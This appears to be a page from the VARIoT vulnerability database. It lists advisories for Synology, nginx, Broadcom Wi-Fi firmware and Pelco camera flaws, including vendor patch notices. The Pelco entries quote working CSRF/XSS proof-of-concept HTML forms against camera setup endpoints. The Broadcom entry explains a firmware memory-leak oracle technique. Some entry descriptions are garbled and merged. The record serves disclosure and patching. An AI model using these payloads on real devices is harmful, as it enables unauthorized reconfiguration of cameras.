VARIoT IoT vulnerabilities database
| VAR-201708-1074 | CVE-2017-11149 | Synology Download Station Server-side request forgery vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Server-side request forgery (SSRF) vulnerability in Downloader in Synology Download Station 3.8.x before 3.8.5-3475 and 3.x before 3.5-2984 allows remote authenticated users to download arbitrary local files via crafted URI. Synology Download Station is a set of web-based download applications from Synology. The program supports protocols such as BT, FTP and HTTP to download files
| VAR-201708-1065 | CVE-2017-11160 | Windows Run on Synology Assistant Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in installer in Synology Assistant before 6.1-15163 on Windows allows local attackers to execute arbitrary code and conduct DLL hijacking attack via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Windows Run on Synology Assistant Contains an unreliable search path vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Synology Assistant on Windows is a Windows-based installation assistant from Synology. installer is one of the installers. An untrusted search path vulnerability exists in the installer of Synology Assistant versions earlier than 6.1-15163 on Windows platforms
| VAR-201708-1073 | CVE-2017-11148 | Synology Chat Server-side request forgery vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Server-side request forgery (SSRF) vulnerability in link preview in Synology Chat before 1.1.0-0806 allows remote authenticated users to access intranet resources via unspecified vectors. Synology Chat Contains a server-side request forgery vulnerability.Information may be obtained. Synology Chat is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
Synology Chat versions prior to 1.1.0-0806 are vulnerable. Synology Chat is an instant chat tool developed by Synology. Link Preview is one of the link preview components. A remote attacker could exploit this vulnerability to access internal network resources
| VAR-201708-1064 | CVE-2017-11159 | Windows Run on Synology Photo Station Uploader Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in installer in Synology Photo Station Uploader before 1.4.2-084 on Windows allows local attackers to execute arbitrary code and conduct DLL hijacking attack via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Windows Run on Synology Photo Station Uploader Contains an unreliable search path vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Synology Photo Station Uploader for Windows is a set of solutions from Synology for sharing pictures, videos and blogs on the Internet
| VAR-201708-1063 | CVE-2017-11158 | Synology Cloud Station Drive Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in the installer in Synology Cloud Station Drive before 4.2.5-4396 on Windows allow local attackers to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Synology Cloud Station Drive Contains an unreliable search path vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Synology Cloud Station Drive for Windows is a Windows-based computer synchronization tool from Synology. installer is one of the installers. (Malicious files include: (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll, or (4) dwmapi.dll)
| VAR-201708-1062 | CVE-2017-11157 | Synology Cloud Station Backup Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in the installer in Synology Cloud Station Backup before 4.2.5-4396 on Windows allow local attackers to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Synology Cloud Station Backup Contains an unreliable search path vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Synology Cloud Station Backup for Windows is a Windows-based application from Synology that can be used to back up computer data. (Malicious files include: (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll, or (4) dwmapi.dll)
| VAR-201708-1061 | CVE-2017-11156 | Synology Download Station Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 7.8 Severity: HIGH |
Synology Download Station 3.8.x before 3.8.5-3475 and 3.x before 3.5-2984 uses weak permissions (0777) for ui/dlm/btsearch directory, which allows remote authenticated users to execute arbitrary code by uploading an executable via unspecified vectors. Synology Download Station Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Synology Download Station is a set of web-based download applications from Synology. The program supports protocols such as BT, FTP and HTTP to download files. There is a security vulnerability in Synology Download Station 3.8.x versions before 3.8.5-3475 and 3.x versions before 3.5-2984. The vulnerability is caused by the program assigning weak permissions (0777) to the ui/dlm/btsearch directory
| VAR-201707-1309 | CVE-2017-7529 | Nginx of range filter Module integer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. nginx is prone to a remote integer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to obtain sensitive information or may crash the application resulting in a denial-of-service condition.
nginx 0.5.6 through 1.13.2 are vulnerable. Nginx is a lightweight web server/reverse proxy server and email (IMAP/POP3) proxy server developed by Russian programmer Igor Sysoev. The range filter module is one of the range filter modules.
For the oldstable distribution (jessie), this problem has been fixed
in version 1.6.2-5+deb8u5.
For the stable distribution (stretch), this problem has been fixed in
version 1.10.3-1+deb9u1.
For the unstable distribution (sid), this problem will be fixed soon.
We recommend that you upgrade your nginx packages.
==========================================================================
Ubuntu Security Notice USN-3352-1
July 13, 2017
nginx vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 17.04
- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
nginx could be made to expose sensitive information over the network. A remote attacker could use this to expose
sensitive information.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 17.04:
nginx-common 1.10.3-1ubuntu3.1
nginx-core 1.10.3-1ubuntu3.1
nginx-extras 1.10.3-1ubuntu3.1
nginx-full 1.10.3-1ubuntu3.1
nginx-light 1.10.3-1ubuntu3.1
Ubuntu 16.10:
nginx-common 1.10.1-0ubuntu1.3
nginx-core 1.10.1-0ubuntu1.3
nginx-extras 1.10.1-0ubuntu1.3
nginx-full 1.10.1-0ubuntu1.3
nginx-light 1.10.1-0ubuntu1.3
Ubuntu 16.04 LTS:
nginx-common 1.10.3-0ubuntu0.16.04.2
nginx-core 1.10.3-0ubuntu0.16.04.2
nginx-extras 1.10.3-0ubuntu0.16.04.2
nginx-full 1.10.3-0ubuntu0.16.04.2
nginx-light 1.10.3-0ubuntu0.16.04.2
Ubuntu 14.04 LTS:
nginx-common 1.4.6-1ubuntu3.8
nginx-core 1.4.6-1ubuntu3.8
nginx-extras 1.4.6-1ubuntu3.8
nginx-full 1.4.6-1ubuntu3.8
nginx-light 1.4.6-1ubuntu3.8
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Low: rh-nginx110-nginx security update
Advisory ID: RHSA-2017:2538-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2017:2538
Issue date: 2017-08-28
CVE Names: CVE-2017-7529
=====================================================================
1. Summary:
An update for rh-nginx110-nginx is now available for Red Hat Software
Collections.
Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
Nginx is a web server and a reverse proxy server for HTTP, SMTP, POP3 and
IMAP protocols, with a strong focus on high concurrency, performance and
low memory usage. A remote attacker could possibly
exploit this flaw to disclose parts of the cache file header, or, if used
in combination with third party modules, disclose potentially sensitive
memory by sending specially crafted HTTP requests. (CVE-2017-7529)
Red Hat would like to thank the Nginx project for reporting this issue.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
rh-nginx110-nginx-1.10.2-8.el6.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):
Source:
rh-nginx110-nginx-1.10.2-8.el6.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
rh-nginx110-nginx-1.10.2-8.el6.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
rh-nginx110-nginx-1.10.2-8.el7.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3):
Source:
rh-nginx110-nginx-1.10.2-8.el7.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-nginx110-nginx-1.10.2-8.el7.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2017-7529
https://access.redhat.com/security/updates/classification/#low
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFZpJOQXlSAg2UNWIIRAmScAJ4wJSfq0I+2JBvww6c9AkJKZx4YAACdHwbT
Rf+yBkpEe91OHNNto3rboqM=
=rlDh
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2021-09-20-4 Xcode 13
Xcode 13 addresses the following issues.
IDE Xcode Server
Available for: macOS Big Sur 11.3 and later
Impact: Multiple issues in nginx
Description: Multiple issues were addressed by updating nginx to
version 1.21.0.
CVE-2016-0742
CVE-2016-0746
CVE-2016-0747
CVE-2017-7529
CVE-2018-16843
CVE-2018-16844
CVE-2018-16845
CVE-2019-20372
Installation note:
Xcode 13 may be obtained from:
https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "Xcode 13"
| VAR-201710-1086 | CVE-2017-11122 | Broadcom BCM4355C0 of Wi-Fi Vulnerability that triggers information disclosure on chip |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
On Broadcom BCM4355C0 Wi-Fi chips 9.44.78.27.0.1.56, an attacker can trigger an information leak due to insufficient length validation, related to ICMPv6 router advertisement offloading. Broadcom BCM4355C0 Wi-Fi chips is a Wi-Fi chip of Broadcom (Broadcom). Wi-Fi firmware is the firmware used in it. There is a security vulnerability in version 9.44.78.27.0.1.56 of the Broadcom BCM4355C0 Wi-Fi chip. The vulnerability is caused by the insufficient calculation length of the program. An attacker could exploit this vulnerability to obtain information. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.
In order to reduce overhead on the host, some Broadcom Wi-Fi chips support offloading of certain ICMPv6 packets, including Router Advertisements, Neighbor Advertisements and Neighbor Solicitations.
On the BCM4355C0 SoC with firmware version 9.44.78.27.0.1.56, the ICMPv6 offloading is performed by ROM function 0x39AF8. This function first inspects the ethertype and ensures that it is an IPv6 packet. Then, it reads the protocol number in the "Next Header" field to verify that this is indeed an ICMPv6 packet (IPv6_ICMP). Lastly, the function reads the ICMPv6 "Type" field, and dispatches the packet to the appropriate handler.
In the case of "Router Advertisment" packets (type 134), ROM function 0x399A0 is called to handle the packet. The function has the following approximate high-level logic:
int function_0x399A0(void* ctx, char* ipv6_header, ...) {
...
//Reading some IPv6 fields
uint16_t payload_length = ntohs(*((uint16_t*)(ipv6_header + 4)));
uint16_t router_lifetime = ntohs(*((uint16_t*)(ipv6_header + 46)));
//Searching for a matching RA
struct ra_context_t* ra_array = (struct ra_context_t*)(*((uint32_t*)ctx + 151));
for (int i=0; i<10; i++) {
struct ra_context_t* ra = &(ra_array[i]);
if (memcmp(ra->src_addr, ipv6_header + 8, 0x10))
continue;
if (ra->payload_length != payload_length)
continue;
if (memcmp(ra->data, ipv6_header + 40, payload_length))
continue;
if (1000 * router_lifetime <= 180000)
continue;
if (firmware_timestamp() >= ra->timestamp + 60000)
continue;
//Found a match!
return 2; //Indicates that the packet is filtered and not passed
//on to the OS
}
//Find the entry to overwrite
uint8_t* insertion_idx_ptr = (uint8_t*)((void*)ra_array + 322);
if (*insertion_idx_ptr > 9)
*insertion_idx_ptr = 0;
struct ra_context_t* ra = &(ra_array[*insertion_idx_ptr]);
//Populate the entry
ra->payload_length = payload_length;
ra->timestamp = firmware_timestamp();
memcpy(ra->src_addr, ipv6_header + 8, 0x10);
char* new_ra_data = malloc(payload_length);
memcpy(new_ra_data, ipv6_header + 40, payload_length);
if (ra->ra_data)
free(ra->ra_data);
ra->ra_data = new_ra_data;
(*insertion_idx_ptr)++;
return 0; //Pass the packet on to the OS
}
Where "ra_context_t" has the following structure:
struct ra_context_t {
char* ra_data;
uint32_t payload_length;
uint32_t unused;
char src_addr[0x10];
uint32_t timestamp;
};
As we can see above, the function fails to validate that the IPv6 "Payload Length" field does not exceed the length of the packet. As a result, if the incoming RA fails to match any of the 10 cached RAs, a new entry will be saved, triggering a copy of packet's content into a newly allocated buffer, using the attacker-controlled "payload length" field (thereby triggering an OOB read).
An attacker can use this as an oracle to leak data from the firmware. First, the attacker can send an RA with a payload length field that exceeds the real packet length by a single byte. Then, the attacker may send additional RAs in which the payload length field does indeed match the length of the packet's payload, and is also the same value as the one sent previously. By doing so, the attacker can modify the last byte of the sent RA, iterating over at-most 10 different values. If the attacker guesses the last byte (which was read OOB) correctly, the packet will be filtered. Otherwise, the packet will be forwarded to the host.
In order to distinguish between these two cases, an attacker can craft the ICMPv6 packet so that a "regular" host will send back an ICMPv6 error message. For example, by setting the TTL field to zero, the host would generate a ICMPv6 "Time Exceeded" error message.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: laginimaineb
| VAR-201905-1051 | CVE-2018-7827 | Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A Cross-Site Scripting (XSS) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which a remote attacker can execute arbitrary HTML and script code in a user’s browser session. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201905-1040 | CVE-2018-7828 | Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
